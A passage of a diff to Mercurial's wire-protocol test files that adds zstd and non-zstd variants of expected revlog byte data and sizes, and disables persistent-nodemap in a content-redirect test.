+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !)
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !)
b''
]
@@ -78,14 +81,17 @@
response: gen[
{
b'filecount': 1,
- b'totalsize': 584
+ b'totalsize': 584 (no-zstd !)
+ b'totalsize': 588 (zstd !)
},
{
b'location': b'store',
b'path': b'00manifest.i',
- b'size': 584
+ b'size': 584 (no-zstd !)
+ b'size': 588 (zstd !)
},
- b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n',
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !)
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !)
b''
]
@@ -100,21 +106,26 @@
response: gen[
{
b'filecount': 2,
- b'totalsize': 1111
+ b'totalsize': 1111 (no-zstd !)
+ b'totalsize': 1118 (zstd !)
},
{
b'location': b'store',
b'path': b'00manifest.i',
- b'size': 584
+ b'size': 584 (no-zstd !)
+ b'size': 588 (zstd !)
},
- b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n',
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !)
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !)
b'',
{
b'location': b'store',
b'path': b'00changelog.i',
- b'size': 527
+ b'size': 527 (no-zstd !)
+ b'size': 530 (zstd !)
},
- b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3',
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !)
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !)
b''
]
--- a/tests/test-wireproto-content-redirects.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-content-redirects.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,10 @@
$ . $TESTDIR/wireprotohelpers.sh
+persistent-nodemap is not enabled by default. It is not relevant for this test so disable it.
+
$ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
> [extensions]
> blackbox =
> [blackbox]
@@ -66,9 +70,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2308\r\n
+ s> Content-Length: 2289\r\n
s> \r\n
